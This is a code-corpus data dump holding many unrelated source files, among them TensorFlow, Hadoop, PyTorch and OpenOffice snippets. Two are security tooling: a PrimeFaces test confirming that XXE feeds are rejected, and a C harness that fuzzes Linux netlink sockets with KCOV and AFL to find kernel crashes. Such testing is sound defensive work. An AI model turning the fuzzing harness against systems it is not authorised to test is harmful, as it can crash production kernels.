max_stars_count
int64 301
224k
| text
stringlengths 6
1.05M
| token_count
int64 3
727k
|
---|---|---|
3,380 | # coding=utf-8
# Copyright 2021 The TensorFlow Datasets Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""cardiotox dataset."""
from tensorflow_datasets.graphs.cardiotox import cardiotox
import tensorflow_datasets.public_api as tfds
class CardiotoxTest(tfds.testing.DatasetBuilderTestCase):
"""Tests for cardiotox dataset."""
DATASET_CLASS = cardiotox.Cardiotox
SPLITS = {
'train': 4, # Number of fake train example
'validation': 2, # Number of fake test example
'test': 2, # Number of fake test example
'test2': 2, # Number of fake test example
}
@classmethod
def setUpClass(cls):
cardiotox._DATA_URL = cls.dummy_data
super().setUpClass()
if __name__ == '__main__':
tfds.testing.test_main()
| 405 |
312 | <reponame>Fruit-Pi/mpp
/*
*
* Copyright 2015 Rockchip Electronics Co. LTD
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
#ifndef __DXVA_SYNTAX_H__
#define __DXVA_SYNTAX_H__
#include "rk_type.h"
enum __MIDL___MIDL_itf_dxva2api_0000_0000_0012 {
DXVA2_PictureParametersBufferType = 0,
DXVA2_MacroBlockControlBufferType = 1,
DXVA2_ResidualDifferenceBufferType = 2,
DXVA2_DeblockingControlBufferType = 3,
DXVA2_InverseQuantizationMatrixBufferType = 4,
DXVA2_SliceControlBufferType = 5,
DXVA2_BitStreamDateBufferType = 6,
DXVA2_MotionVectorBuffer = 7,
DXVA2_FilmGrainBuffer = 8
};
typedef struct _DXVA2_ConfigPictureDecode {
//GUID guidConfigBitstreamEncryption;
//GUID guidConfigMBcontrolEncryption;
//GUID guidConfigResidDiffEncryption;
RK_U32 ConfigBitstreamRaw;
//UINT ConfigMBcontrolRasterOrder;
//UINT ConfigResidDiffHost;
//UINT ConfigSpatialResid8;
//UINT ConfigResid8Subtraction;
//UINT ConfigSpatialHost8or9Clipping;
//UINT ConfigSpatialResidInterleaved;
//UINT ConfigIntraResidUnsigned;
//UINT ConfigResidDiffAccelerator;
//UINT ConfigHostInverseScan;
//UINT ConfigSpecificIDCT;
//UINT Config4GroupedCoefs;
//USHORT ConfigMinRenderTargetBuffCount;
//USHORT ConfigDecoderSpecific;
} DXVA2_ConfigPictureDecode;
typedef struct _DXVA2_DecodeBufferDesc {
RK_U32 CompressedBufferType;
RK_U32 BufferIndex;
RK_U32 DataOffset;
RK_U32 DataSize;
RK_U32 FirstMBaddress;
RK_U32 NumMBsInBuffer;
RK_U32 Width;
RK_U32 Height;
RK_U32 Stride;
RK_U32 ReservedBits;
void *pvPVPState;
} DXVA2_DecodeBufferDesc;
#endif /*__DXVA_SYNTAX_H__*/
| 934 |
5,169 | {
"name": "RevenueXBeta",
"version": "0.1.0",
"summary": "Subscription and purchase tracking system",
"description": "Secure, reliable, and free to use in-app purchase server. Build and manage your app business without having to maintain purchase infrastructure.",
"homepage": "https://bitbucket.org/mobilexturkey/revenuex-ios-sdk-public.git",
"license": {
"type": "MIT"
},
"authors": {
"Mobilex, Inc.": "<EMAIL>"
},
"source": {
"git": "https://bitbucket.org/mobilexturkey/revenuex-ios-sdk-public.git",
"tag": "0.1.0"
},
"documentation_url": "https://bitbucket.org/mobilexturkey/revenuex-ios-sdk-public/src/master/README.md",
"resources": "RevenueX/**/*.{xcdatamodeld}",
"frameworks": "StoreKit",
"swift_versions": "5.0",
"platforms": {
"ios": "10.0"
},
"source_files": "RevenueX/**/*.{swift}",
"swift_version": "5.0"
}
| 346 |
1,443 | <gh_stars>1000+
{
"copyright": "<NAME>, http://psykzz.co.uk",
"url": "http://psykzz.co.uk",
"email": "<EMAIL>",
"format": "txt",
"theme": "black-beauty",
"gravatar": true
}
| 84 |
965 | <gh_stars>100-1000
// This example uses the CWnd::IsWindowVisible() function to
// determine if a dialog box is visible. If it is not, it calls
// CWnd::ShowWindow with the SW_SHOWNORMAL command.
void CMainFrame::DisplayModeless()
{
if(!m_Modeless.IsWindowVisible())
{
m_Modeless.ShowWindow(SW_SHOWNORMAL);
}
}
// This example uses the CWnd::IsWindowVisible() function to
// determine if a dialog box is visible. If it is, it calls
// CWnd::ShowWindow with the SW_HIDE command.
void CMainFrame::HideModeless()
{
if(m_Modeless.IsWindowVisible())
{
m_Modeless.ShowWindow(SW_HIDE);
}
} | 221 |
370 | /** @file tcpclient.h
* @brief Open a TCP connection to a server.
*/
/* Copyright (C) 2007,2008,2010 <NAME>
*
* This program is free software; you can redistribute it and/or
* modify it under the terms of the GNU General Public License as
* published by the Free Software Foundation; either version 2 of the
* License, or (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
*/
#ifndef XAPIAN_INCLUDED_TCPCLIENT_H
#define XAPIAN_INCLUDED_TCPCLIENT_H
#include <string>
namespace TcpClient {
/** Attempt to open a TCP/IP socket connection to a server.
*
* Connect to the server running on port @a port of host @a hostname.
* Give up trying to connect after @a timeout_connect seconds.
*/
int open_socket(const std::string & hostname, int port,
double timeout_connect, bool tcp_nodelay);
}
#endif // XAPIAN_INCLUDED_TCPCLIENT_H
| 404 |
1,773 | /*
* The MIT License
*
* Copyright (c) 2009-2021 PrimeTek
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
* in the Software without restriction, including without limitation the rights
* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
* copies of the Software, and to permit persons to whom the Software is
* furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included in
* all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
* THE SOFTWARE.
*/
package org.primefaces.component.feedreader;
import com.rometools.rome.io.ParsingFeedException;
import java.net.URL;
import java.util.List;
import org.junit.jupiter.api.Test;
import static org.junit.jupiter.api.Assertions.*;
public class FeedReaderTest {
@Test()
public void parseXXEbomb() throws Exception {
// Check CVE-2021-33813 can not be triggered in Primefaces
// See https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33813
// See https://alephsecurity.com/vulns/aleph-2021003
URL feed = FeedReaderTest.class.getResource("/org/primefaces/feeds/XXEbomb.xml");
assertThrows(ParsingFeedException.class, () -> new FeedInput().parse(feed.toString(), 1));
}
@Test()
public void parseXXE() throws Exception {
URL feed = FeedReaderTest.class.getResource("/org/primefaces/feeds/XXE.xml");
assertThrows(ParsingFeedException.class, () -> new FeedInput().parse(feed.toString(), 1));
}
@Test()
public void parseRSS() throws Exception {
URL feed = FeedReaderTest.class.getResource("/org/primefaces/feeds/RSS2.0.xml");
List rss = new FeedInput().parse(feed.toString(), 10);
assertNotNull(rss);
assertEquals(2, rss.size());
}
} | 785 |
833 | <reponame>gozdal/cloudflare-blog
#include <fcntl.h>
#include <getopt.h>
#include <linux/netlink.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <unistd.h>
#include "common.h"
struct state {
int one_run;
int verbose;
int dump;
int no_kcov;
int netns;
char *user_dmesg;
};
static void usage(const char *command)
{
fprintf(stderr,
"Usage:\n"
"\n"
" %s [options]\n"
"\n"
"Options:\n"
"\n"
" -v --verbose Print stuff to stderr\n"
" -r --one-run Exit after first data read\n"
" -d --dump Dump KCOV offsets\n"
" -k --no-kcov Don't attempt to run KCOV\n"
" -n --netns=N Set up new a namespace every N tests\n"
" -m --dmesg=FILE Copy /dev/kmsg into a file\n"
"\n",
command);
}
int main(int argc, char **argv)
{
static struct option long_options[] = {
{"verbose", no_argument, 0, 'v'},
{"one-run", no_argument, 0, 'r'},
{"dump", no_argument, 0, 'd'},
{"help", no_argument, 0, 'h'},
{"no-kcov", no_argument, 0, 'k'},
{"netns", optional_argument, 0, 'n'},
{"dmesg", required_argument, 0, 'm'},
{NULL, 0, 0, 0}};
const char *optstring = optstring_from_long_options(long_options);
struct state *state = calloc(1, sizeof(struct state));
optind = 1;
while (1) {
int option_index = 0;
int arg = getopt_long(argc, argv, optstring, long_options,
&option_index);
if (arg == -1) {
break;
}
switch (arg) {
case 0:
fprintf(stderr, "Unknown option: %s", argv[optind]);
exit(-1);
break;
case 'h':
usage(argv[0]);
exit(0);
break;
case '?':
exit(-1);
break;
case 'v':
state->verbose++;
break;
case 'r':
state->one_run++;
break;
case 'd':
state->dump++;
break;
case 'k':
state->no_kcov++;
break;
case 'n':
if (optarg) {
state->netns = atoi(optarg);
} else {
state->netns++;
}
break;
case 'm':
state->user_dmesg = optarg;
break;
default:
fprintf(stderr, "Unknown option %c: %s\n", arg,
argv[optind]);
exit(-1);
}
}
uint32_t child_pid = getpid() + 1;
struct forksrv *forksrv = forksrv_new();
forksrv_welcome(forksrv);
uint8_t *afl_area_ptr = forksrv_area_ptr(forksrv);
struct kcov *kcov = NULL;
uint64_t *kcov_cover_buf = NULL;
if (state->no_kcov == 0) {
kcov = kcov_new();
kcov_cover_buf = kcov_cover(kcov);
}
if (state->verbose) {
fprintf(stderr, "[.] Starting v=%d r=%d netns=%d\n",
state->verbose, state->one_run, state->netns);
}
/* Read on dmesg /dev/kmsg for crashes. */
int dmesg_fs = -1;
dmesg_fs = open("/dev/kmsg", O_RDONLY | O_NONBLOCK);
if (dmesg_fs < 0) {
PFATAL("open(/dev/kmsg)");
}
lseek(dmesg_fs, 0, SEEK_END);
/* Perhaps copy over dmesg data to user file */
int user_dmesg_fs = -1;
if (state->user_dmesg) {
user_dmesg_fs = open(state->user_dmesg,
O_APPEND | O_WRONLY | O_CREAT, 0644);
if (user_dmesg_fs < 0) {
PFATAL("can't open %s for append", state->user_dmesg);
}
char hello[] = ",;: Restarting fuzzing\n";
int x = write(user_dmesg_fs, hello, strlen(hello));
(void)x;
}
/* MAIN LOOP */
int run_no;
int force_new_netns = 1;
for (run_no = 0; 1; run_no += 1) {
/* Convince AFL we started a child. */
forksrv_cycle(forksrv, child_pid);
/* Load input from AFL (stdin) */
char buf[512 * 1024];
memset(buf, 0, 32);
int buf_len = read(0, buf, sizeof(buf));
if (buf_len < 0) {
PFATAL("read(stdin)");
}
if (buf_len < 5) {
buf_len = 5;
}
if (state->verbose) {
fprintf(stderr, "[.] %d bytes on input\n", buf_len);
}
int kcov_len = 0;
/* Once every netns runs cycle network namespaces */
if ((state->netns && (run_no % state->netns) == 0) ||
force_new_netns != 0) {
netns_new();
force_new_netns = 0;
}
/* START coverage collection on the current task. */
if (kcov) {
kcov_enable(kcov);
}
int netlink_fd =
socket(AF_NETLINK, SOCK_RAW | SOCK_NONBLOCK, buf[0]);
if (netlink_fd < 0) {
goto error;
}
struct sockaddr_nl sa = {
.nl_family = AF_NETLINK,
.nl_groups = (buf[1] << 24) | (buf[2] << 16) |
(buf[3] << 8) | buf[4],
};
int r = bind(netlink_fd, (struct sockaddr *)&sa, sizeof(sa));
if (r < 0) {
goto error;
}
struct iovec iov = {&buf[5], buf_len - 5};
struct sockaddr_nl sax = {
.nl_family = AF_NETLINK,
};
struct msghdr msg = {&sax, sizeof(sax), &iov, 1, NULL, 0, 0};
r = sendmsg(netlink_fd, &msg, 0);
if (r != -1) {
char buf[8192];
struct iovec iov = {buf, sizeof(buf)};
struct sockaddr_nl sa;
struct msghdr msg = {&sa, sizeof(sa), &iov, 1,
NULL, 0, 0};
recvmsg(netlink_fd, &msg, 0);
}
error:
if (netlink_fd >= 0) {
close(netlink_fd);
}
/* STOP coverage */
if (kcov) {
kcov_len = kcov_disable(kcov);
}
/* Read recorded %rip */
int i;
uint64_t afl_prev_loc = 0;
for (i = 0; i < kcov_len; i++) {
uint64_t current_loc = kcov_cover_buf[i + 1];
uint64_t hash = hsiphash_static(¤t_loc,
sizeof(unsigned long));
uint64_t mixed = (hash & 0xffff) ^ afl_prev_loc;
afl_prev_loc = (hash & 0xffff) >> 1;
uint8_t *s = &afl_area_ptr[mixed];
int r = __builtin_add_overflow(*s, 1, s);
if (r) {
/* Boxing. AFL is fine with overflows,
* but we can be better. Drop down to
* 128 on overflow. */
*s = 128;
}
if (state->dump) {
printf("0x%016lx%s\n", current_loc, "");
}
}
if (state->verbose) {
fprintf(stderr, "[.] %d measurements\n", kcov_len);
}
/* Check dmesg if there was something interesting */
int crashed = 0;
while (1) {
// /dev/kmsg gives us one line per read
char buf[8192];
int r = read(dmesg_fs, buf, sizeof(buf) - 1);
if (r <= 0) {
break;
}
if (state->user_dmesg) {
int x = write(user_dmesg_fs, buf, r);
(void)x;
}
buf[r] = '\x00';
if (strstr(buf, "Call Trace") != NULL ||
strstr(buf, "RIP:") != NULL ||
strstr(buf, "Code:") != NULL) {
crashed += 1;
}
}
if (crashed) {
fprintf(stderr, "[!] BUG detected\n");
forksrv_status(forksrv, 139);
force_new_netns = 1;
} else {
forksrv_status(forksrv, 0);
}
if (state->one_run) {
break;
}
}
forksrv_free(forksrv);
if (kcov) {
kcov_free(kcov);
}
return 0;
}
| 3,138 |
1,088 | <reponame>hgroll/tikzplotlib<gh_stars>1000+
def plot():
import numpy as np
from matplotlib import pyplot as plt
fig = plt.figure()
an = np.linspace(0, 2 * np.pi, 10)
plt.subplot(221)
plt.plot(3 * np.cos(an), 3 * np.sin(an))
plt.title("not equal, looks like ellipse", fontsize=10)
plt.subplot(222)
plt.plot(3 * np.cos(an), 3 * np.sin(an))
plt.axis("equal")
plt.title("equal, looks like circle", fontsize=10)
plt.subplot(223)
plt.plot(3 * np.cos(an), 3 * np.sin(an))
plt.axis("equal")
plt.axis([-3, 3, -3, 3])
plt.title("looks like circle, even after changing limits", fontsize=10)
plt.subplot(224)
plt.plot(3 * np.cos(an), 3 * np.sin(an))
plt.axis("equal")
plt.axis([-3, 3, -3, 3])
plt.plot([0, 4], [0, 4])
plt.title("still equal after adding line", fontsize=10)
return fig
def test():
from .helpers import assert_equality
assert_equality(plot, __file__[:-3] + "_reference.tex")
| 451 |
14,425 | <filename>hadoop-common-project/hadoop-common/src/test/java/org/apache/hadoop/security/authorize/TestDefaultImpersonationProvider.java
/**
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.hadoop.security.authorize;
import static org.mockito.Mockito.when;
import org.apache.hadoop.conf.Configuration;
import org.apache.hadoop.security.UserGroupInformation;
import org.apache.hadoop.test.LambdaTestUtils;
import org.junit.After;
import org.junit.Before;
import org.junit.Rule;
import org.junit.Test;
import org.junit.rules.Timeout;
import org.mockito.Mockito;
import java.util.concurrent.TimeUnit;
/**
* Test class for @DefaultImpersonationProvider
*/
public class TestDefaultImpersonationProvider {
private String proxyUser;
private String user;
private DefaultImpersonationProvider provider;
private UserGroupInformation userGroupInformation = Mockito
.mock(UserGroupInformation.class);
private UserGroupInformation realUserUGI = Mockito
.mock(UserGroupInformation.class);
private Configuration conf;
@Rule
public Timeout globalTimeout = new Timeout(10000, TimeUnit.MILLISECONDS);
@Before
public void setup() {
conf = new Configuration();
provider = new DefaultImpersonationProvider();
// Setup 3 proxy users
conf.set("hadoop.proxyuser.fakeuser.groups", "*");
conf.set("hadoop.proxyuser.fakeuser.hosts", "*");
conf.set("hadoop.proxyuser.test.user.groups", "*");
conf.set("hadoop.proxyuser.test.user.hosts", "*");
conf.set("hadoop.proxyuser.test user2.groups", "*");
conf.set("hadoop.proxyuser.test user2.hosts", "*");
provider.setConf(conf);
provider.init(ProxyUsers.CONF_HADOOP_PROXYUSER);
}
@Test
public void testAuthorizationSuccess() throws AuthorizationException {
proxyUser = "fakeuser";
user = "dummyUser";
when(realUserUGI.getShortUserName()).thenReturn(proxyUser);
when(userGroupInformation.getRealUser()).thenReturn(realUserUGI);
provider.authorize(userGroupInformation, "2.2.2.2");
user = "somerandomuser";
proxyUser = "test.user";
when(realUserUGI.getShortUserName()).thenReturn(proxyUser);
when(userGroupInformation.getRealUser()).thenReturn(realUserUGI);
provider.authorize(userGroupInformation, "2.2.2.2");
}
@Test
public void testAuthorizationFailure() throws Exception {
user = "dummyUser";
proxyUser = "test user2";
when(realUserUGI.getShortUserName()).thenReturn(proxyUser);
when(realUserUGI.getUserName()).thenReturn(proxyUser);
when(userGroupInformation.getUserName()).thenReturn(user);
when(userGroupInformation.getRealUser()).thenReturn(realUserUGI);
LambdaTestUtils.intercept(AuthorizationException.class, "User: "
+ proxyUser + " is not allowed to impersonate " + user, () ->
provider.authorize(userGroupInformation, "2.2.2.2"));
}
@After
public void clear() {
provider = null;
conf = null;
userGroupInformation = null;
realUserUGI = null;
}
}
| 1,214 |
763 | <reponame>zabrewer/batfish
package org.batfish.datamodel.questions;
import com.fasterxml.jackson.annotation.JsonProperty;
import javax.annotation.Nullable;
import javax.annotation.ParametersAreNonnullByDefault;
import org.batfish.common.BfConsts;
/** Settings for field of complex {@link org.batfish.datamodel.questions.Variable}. */
@ParametersAreNonnullByDefault
public final class Field {
private boolean _optional;
@Nullable private Variable.Type _type;
@JsonProperty(BfConsts.PROP_OPTIONAL)
public boolean getOptional() {
return _optional;
}
@Nullable
@JsonProperty(BfConsts.PROP_TYPE)
public Variable.Type getType() {
return _type;
}
@JsonProperty(BfConsts.PROP_OPTIONAL)
public void setOptional(boolean optional) {
_optional = optional;
}
@JsonProperty(BfConsts.PROP_TYPE)
public void setType(Variable.Type type) {
_type = type;
}
}
| 317 |
706 | <gh_stars>100-1000
from __future__ import print_function, division
import torch
import torch.nn as nn
class mfcc_encoder(nn.Module):
def __init__(self, norm_layer=nn.BatchNorm2d):
super(mfcc_encoder, self).__init__()
use_bias = norm_layer == nn.InstanceNorm2d
self.relu = nn.LeakyReLU(0.2, True)
self.conv1 = nn.Conv2d(1, 64, kernel_size=(3, 3),
stride=(3, 2), padding=(1, 2), bias=use_bias)
self.pool1 = nn.AvgPool2d((2, 2), 2)
self.bn1 = norm_layer(64)
self.conv2 = nn.Conv2d(64, 128, (3, 3), 2, 1, bias=use_bias)
self.pool2 = nn.AvgPool2d(2,2)
self.bn2 = norm_layer(128)
self.conv3 = nn.Conv2d(128, 256, (3, 3), 1, 0, bias=use_bias)
self.bn3 = norm_layer(256)
self.conv4 = nn.Conv2d(256, 512, (2, 2), 1, bias=use_bias)
self.bn5 = norm_layer(512)
self.tanh = nn.Tanh()
def forward(self, x):
net1 = self.conv1(x)
net1 = self.bn1(net1)
net1 = self.relu(net1)
net = self.conv2(net1)
net = self.bn2(net)
net = self.relu(net)
net = self.conv3(net)
net = self.bn3(net)
net = self.relu(net)
net = self.conv4(net)
return net
class mfcc_encoder_alter(nn.Module):
def __init__(self):
super(mfcc_encoder_alter, self).__init__()
self.relu = nn.LeakyReLU(0.2, True)
self.conv1 = nn.Conv2d(1, 64, kernel_size=(3, 12), stride=(1,1), padding=0, bias=False)
self.bn1 = nn.BatchNorm1d(64)
self.pool1 = nn.MaxPool2d(1, 3)
self.conv2 = nn.Conv2d(64, 256, (3, 1), 1, (1, 0), bias=False)
self.bn2 = nn.BatchNorm2d(256)
self.pool2 = nn.MaxPool2d(1, 2)
self.conv3 = nn.Conv2d(256, 512, (3, 1), 1, bias=False)
def forward(self, x):
net = self.conv1(x)
net = self.relu(self.bn1(net))
net = self.pool1(net)
net = self.conv2(net)
net = self.relu(self.bn2(net))
net = self.pool2(net)
net = self.conv3(net)
return net
class mfcc_encoder_two(nn.Module):
def __init__(self, opt):
super(mfcc_encoder_two, self).__init__()
self.opt = opt
self.model1 = mfcc_encoder()
self.model2 = mfcc_encoder_alter()
self.fc = nn.Linear(1024, 256)
def _forward(self, x):
net1 = self.model1.forward(x)
net2 = self.model2.forward(x)
net = torch.cat((net1, net2), 1)
net = net.view(-1, 1024)
net = self.fc(net)
return net
def forward(self, x):
x0 = x.view(-1, 1, self.opt.mfcc_length, self.opt.mfcc_width)
net = self._forward(x0)
net = net.view(x.size(0), -1, 256)
return net
| 1,490 |
923 | // Ouzel by <NAME>
#ifndef OUZEL_PLATFORM_COCOA_WINDOW_HPP
#define OUZEL_PLATFORM_COCOA_WINDOW_HPP
#ifdef __OBJC__
# import <Cocoa/Cocoa.h>
typedef NSWindow* NSWindowPtr;
#else
# include <objc/NSObjCRuntime.h>
using NSWindowPtr = id;
#endif
namespace ouzel::platform::cocoa
{
class Window final
{
public:
};
}
#endif // OUZEL_PLATFORM_COCOA_WINDOW_HPP
| 179 |
679 | <gh_stars>100-1000
/**************************************************************
*
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing,
* software distributed under the License is distributed on an
* "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
* KIND, either express or implied. See the License for the
* specific language governing permissions and limitations
* under the License.
*
*************************************************************/
import com.sun.star.beans.PropertyValue;
import com.sun.star.beans.XPropertySet;
import com.sun.star.uno.XComponentContext;
import com.sun.star.comp.helper.Bootstrap;
import com.sun.star.container.XEnumeration;
import com.sun.star.container.XEnumerationAccess;
import com.sun.star.frame.XComponentLoader;
import com.sun.star.frame.XController;
import com.sun.star.frame.XModel;
import com.sun.star.lang.XComponent;
import com.sun.star.lang.XMultiComponentFactory;
import com.sun.star.sheet.XCellAddressable;
import com.sun.star.sheet.XCellRangesQuery;
import com.sun.star.sheet.XSheetCellRanges;
import com.sun.star.sheet.XSpreadsheet;
import com.sun.star.sheet.XSpreadsheetDocument;
import com.sun.star.sheet.XSpreadsheetView;
import com.sun.star.sheet.XSpreadsheets;
import com.sun.star.table.XCell;
import com.sun.star.uno.UnoRuntime;
public class FirstLoadComponent {
/** Creates a new instance of FirstLoadComponent */
public FirstLoadComponent() {
}
/**
* @param args the command line arguments
*/
public static void main(String[] args) {
try {
// get the remote office component context
XComponentContext xRemoteContext = Bootstrap.bootstrap();
if (xRemoteContext == null) {
System.err.println("ERROR: Could not bootstrap default Office.");
}
XMultiComponentFactory xRemoteServiceManager = xRemoteContext.getServiceManager();
Object desktop = xRemoteServiceManager.createInstanceWithContext(
"com.sun.star.frame.Desktop", xRemoteContext);
XComponentLoader xComponentLoader = (XComponentLoader)
UnoRuntime.queryInterface(XComponentLoader.class, desktop);
PropertyValue[] loadProps = new PropertyValue[0];
XComponent xSpreadsheetComponent = xComponentLoader.loadComponentFromURL("private:factory/scalc", "_blank", 0, loadProps);
XSpreadsheetDocument xSpreadsheetDocument = (XSpreadsheetDocument)
UnoRuntime.queryInterface(XSpreadsheetDocument.class,
xSpreadsheetComponent);
XSpreadsheets xSpreadsheets = xSpreadsheetDocument.getSheets();
xSpreadsheets.insertNewByName("MySheet", (short)0);
com.sun.star.uno.Type elemType = xSpreadsheets.getElementType();
System.out.println(elemType.getTypeName());
Object sheet = xSpreadsheets.getByName("MySheet");
XSpreadsheet xSpreadsheet = (XSpreadsheet)UnoRuntime.queryInterface(
XSpreadsheet.class, sheet);
XCell xCell = xSpreadsheet.getCellByPosition(0, 0);
xCell.setValue(21);
xCell = xSpreadsheet.getCellByPosition(0, 1);
xCell.setValue(21);
xCell = xSpreadsheet.getCellByPosition(0, 2);
xCell.setFormula("=sum(A1:A2)");
XPropertySet xCellProps = (XPropertySet)UnoRuntime.queryInterface(
XPropertySet.class, xCell);
xCellProps.setPropertyValue("CellStyle", "Result");
XModel xSpreadsheetModel = (XModel)UnoRuntime.queryInterface(
XModel.class, xSpreadsheetComponent);
XController xSpreadsheetController = xSpreadsheetModel.getCurrentController();
XSpreadsheetView xSpreadsheetView = (XSpreadsheetView)
UnoRuntime.queryInterface(XSpreadsheetView.class,
xSpreadsheetController);
xSpreadsheetView.setActiveSheet(xSpreadsheet);
// *********************************************************
// example for use of enum types
xCellProps.setPropertyValue("VertJustify",
com.sun.star.table.CellVertJustify.TOP);
// *********************************************************
// example for a sequence of PropertyValue structs
// create an array with one PropertyValue struct, it contains
// references only
loadProps = new PropertyValue[1];
// instantiate PropertyValue struct and set its member fields
PropertyValue asTemplate = new PropertyValue();
asTemplate.Name = "AsTemplate";
asTemplate.Value = new Boolean(true);
// assign PropertyValue struct to array of references for PropertyValue
// structs
loadProps[0] = asTemplate;
// load calc file as template
//xSpreadsheetComponent = xComponentLoader.loadComponentFromURL(
// "file:///c:/temp/DataAnalysys.ods", "_blank", 0, loadProps);
// *********************************************************
// example for use of XEnumerationAccess
XCellRangesQuery xCellQuery = (XCellRangesQuery)
UnoRuntime.queryInterface(XCellRangesQuery.class, sheet);
XSheetCellRanges xFormulaCells = xCellQuery.queryContentCells(
(short)com.sun.star.sheet.CellFlags.FORMULA);
XEnumerationAccess xFormulas = xFormulaCells.getCells();
XEnumeration xFormulaEnum = xFormulas.createEnumeration();
while (xFormulaEnum.hasMoreElements()) {
Object formulaCell = xFormulaEnum.nextElement();
xCell = (XCell)UnoRuntime.queryInterface(XCell.class, formulaCell);
XCellAddressable xCellAddress = (XCellAddressable)
UnoRuntime.queryInterface(XCellAddressable.class, xCell);
System.out.println("Formula cell in column " +
xCellAddress.getCellAddress().Column
+ ", row " + xCellAddress.getCellAddress().Row
+ " contains " + xCell.getFormula());
}
}
catch (java.lang.Exception e){
e.printStackTrace();
}
finally {
System.exit( 0 );
}
}
}
// import com.sun.star.uno.UnoRuntime;
// import com.sun.star.uno.XComponentContext;
// import com.sun.star.lang.XMultiComponentFactory;
// import com.sun.star.lang.XComponent;
// import com.sun.star.beans.XPropertySet;
// import com.sun.star.beans.PropertyValue;
// import com.sun.star.sheet.XSpreadsheetDocument;
// import com.sun.star.sheet.XSpreadsheets;
// import com.sun.star.sheet.XSpreadsheet;
// import com.sun.star.sheet.XSpreadsheetView;
// import com.sun.star.sheet.XCellRangesQuery;
// import com.sun.star.sheet.XSheetCellRanges;
// import com.sun.star.sheet.XCellAddressable;
// import com.sun.star.table.XCell;
// import com.sun.star.frame.XModel;
// import com.sun.star.frame.XController;
// import com.sun.star.frame.XComponentLoader;
// import com.sun.star.container.XEnumeration;
// import com.sun.star.container.XEnumerationAccess;
// import com.sun.star.uno.AnyConverter;
// /**
// *
// * @author dschulten
// */
// public class FirstLoadComponent {
// /** Creates a new instance of FirstLoadComponent */
// public FirstLoadComponent() {
// }
// /**
// * @param args the command line arguments
// */
// private XComponentContext xRemoteContext = null;
// private XMultiComponentFactory xRemoteServiceManager = null;
// public static void main(String[] args) {
// FirstLoadComponent firstLoadComponent1 = new FirstLoadComponent();
// try {
// firstLoadComponent1.useConnection();
// }
// catch (java.lang.Exception e){
// System.out.println(e.getMessage());
// e.printStackTrace();
// }
// finally {
// System.exit(0);
// }
// }
// private void useConnection() throws java.lang.Exception {
// try {
// // get the remote office component context
// xRemoteContext = com.sun.star.comp.helper.Bootstrap.bootstrap();
// System.out.println("Connected to a running office ...");
// xRemoteServiceManager = xRemoteContext.getServiceManager();
// }
// catch( Exception e) {
// e.printStackTrace();
// System.exit(1);
// }
// try {
// Object desktop = xRemoteServiceManager.createInstanceWithContext(
// "com.sun.star.frame.Desktop", xRemoteContext);
// XComponentLoader xComponentLoader = (XComponentLoader)
// UnoRuntime.queryInterface(XComponentLoader.class, desktop);
// PropertyValue[] loadProps = new PropertyValue[0];
// XComponent xSpreadsheetComponent = xComponentLoader.loadComponentFromURL("private:factory/scalc", "_blank", 0, loadProps);
// XSpreadsheetDocument xSpreadsheetDocument = (XSpreadsheetDocument)
// UnoRuntime.queryInterface(XSpreadsheetDocument.class,
// xSpreadsheetComponent);
// XSpreadsheets xSpreadsheets = xSpreadsheetDocument.getSheets();
// xSpreadsheets.insertNewByName("MySheet", (short)0);
// com.sun.star.uno.Type elemType = xSpreadsheets.getElementType();
// System.out.println(elemType.getTypeName());
// Object sheet = xSpreadsheets.getByName("MySheet");
